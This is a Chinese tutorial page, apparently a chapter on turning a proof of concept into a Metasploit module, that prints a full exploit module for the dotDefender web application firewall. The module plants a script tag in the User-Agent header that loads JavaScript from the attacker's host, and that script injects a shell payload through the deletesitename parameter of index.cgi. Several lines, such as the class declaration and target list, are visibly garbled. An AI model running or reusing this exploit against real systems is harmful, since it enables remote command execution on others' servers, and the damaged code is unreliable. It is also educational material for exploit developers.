Metasploit 最终DotDefende漏洞利用

DotDefende

所以现在我们可以再次看到最终的DotDefende漏洞利用。只需几个简单的步骤,就可以从PoC到完整的Metasploit模块。我们将在后面的章节中进一步扩展这些代码,深入探讨如何制作更好的Metasploit模块,例如扩展目标,提高可靠性等。

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3  "dotDefender  %q{
                    This module exploits a vulnerability found in dotDefender.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'John Dos',   #Initial remote execution discovery
                    'rAWjAW'  	  #Everything else
                ],
            'References'     =>
                [
                    ['EDB', '14310'],
                    ['URL', 'http://www.exploit-db.com/exploits/14310/']
                ],
            'Arch'           => ARCH_CMD,
	   'Compat'          =>
		{
	            'PayloadType' => 'cmd'
		},
            'Platform'       => ['unix','linux'],
            'Targets'        =>
                [
                    ['dotDefender  false,
            'DefaultTarget'  => 0))
 
        register_options(
            [
            	OptString.new('TRIGGERLOG',  [true, 'This is what is used to trigger a log entry.','<script>alert(\'xss\')>/script>']),
		OptString.new('SITENAME',  [true, 'This is usually the same as RHOST but is available as an option if different']),
		OptString.new('LHOST',  [true, 'This is the IP to connect back to for the javascript','0.0.0.0']),
		OptString.new('URIPATH', [true, 'This is the URI path that will be created for the javascript hosted file','DotDefender.js']),
		OptString.new('SRVPORT', [true, 'This is the port for the javascript to connect back to','80']),
            ], self.class)
    	end


	def exploit
            resp = send_request_raw({
	    'uri'     => "http://#{rhost}/",
	    'version' => '1.1',
	    'method' => 'GET',
	    'headers' =>
	    {
	            'Content-Type' => 'application/x-www-form-urlencoded',
                    'User-Agent' => "Mozilla Firefox <script language=\"JavaScript\" src=\"http://#{datastore['lhost']}:#{datastore['SRVPORT']}/#{datastore['uripath']}\">",
             },
                    'data' => "#{datastore['TRIGGERLOG']}"
          })
		
          super

          end

          def on_request_uri(cli, request)

		return if ((p = regenerate_payload(cli)) == nil)

		sitename = datastore['SITENAME']

		content = %Q|
		var http = new XMLHttpRequest();
		var url = "../index.cgi";
		var params = "sitename=#{sitename}&deletesitename=#{sitename};#{payload.encoded};&action=deletesite&linenum=14";
		http.open("POST",url,true);
		http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
		http.setRequestHeader("Content-lenth", params.length);
		http.setRequestHeader("Connection","close");

		http.conreadystatechange = function() {
		    if(http.readyState == 4 && http.status == 200) {
		        alert(http.responseText);
		        }
		}
		http.send(params);


		var http2 = new XMLHttpRequest();
		var params2 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
		http2.open("POST",url,true);
		http2.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
		http2.setRequestHeader("Content-lenth", params2.length);
		http2.setRequestHeader("Connection","close");

		http2.conreadystatechange = function() {
		    if(http2.readyState == 4 && http2.status == 200) {
		        alert(http2.responseText);
		        }
		}
		http2.send(params2);


		var http3 = new XMLHttpRequest();
		var params3 = "newsitename=#{sitename}&action=newsite";
		http3.open("POST",url,true);
		http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
		http3.setRequestHeader("Content-lenth", params3.length);
		http3.setRequestHeader("Connection","close");

		http3.conreadystatechange = function() {
		    if(http3.readyState == 4 && http3.status == 200) {
		        alert(http3.responseText);
		        }
		}
		http3.send(params3);


		var http4 = new XMLHttpRequest();
		var params4 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
		http4.open("POST",url,true);
		http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
		http4.setRequestHeader("Content-lenth", params4.length);
		http4.setRequestHeader("Connection","close");

		http4.conreadystatechange = function() {
		    if(http4.readyState == 4 && http4.status == 200) {
		        alert(http4.responseText);
		        }
		}
		http4.send(params4);
			|

		print_status("Sending #{self.name}")

		send_response_html(cli, content)
		
          end

end
    A+
发布日期:2018年05月30日 00:42:54  所属分类:Metasploit
最后更新时间:2018-05-30 22:06:10
评分: (3 票;平均数2.33 ;最高评分 5 ;用户总数3;总得分 7;百分比46.67)
付杰
Photoshop CS视频教程全集:1000集PS课程
  • ¥ 199.0元
  • 市场价:899.0元
wp dz 帝国 dede phpcms等快速建站服务
wp dz 帝国 dede phpcms等快速建站服务
  • ¥ 999元
  • 市场价:4999元
React.js视频教程:全新React.js16.12技术合集
  • ¥ 69.0元
  • 市场价:69.0元
PHP零基础入门到精通视频教程
  • ¥ 199.0元
  • 市场价:199.0元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: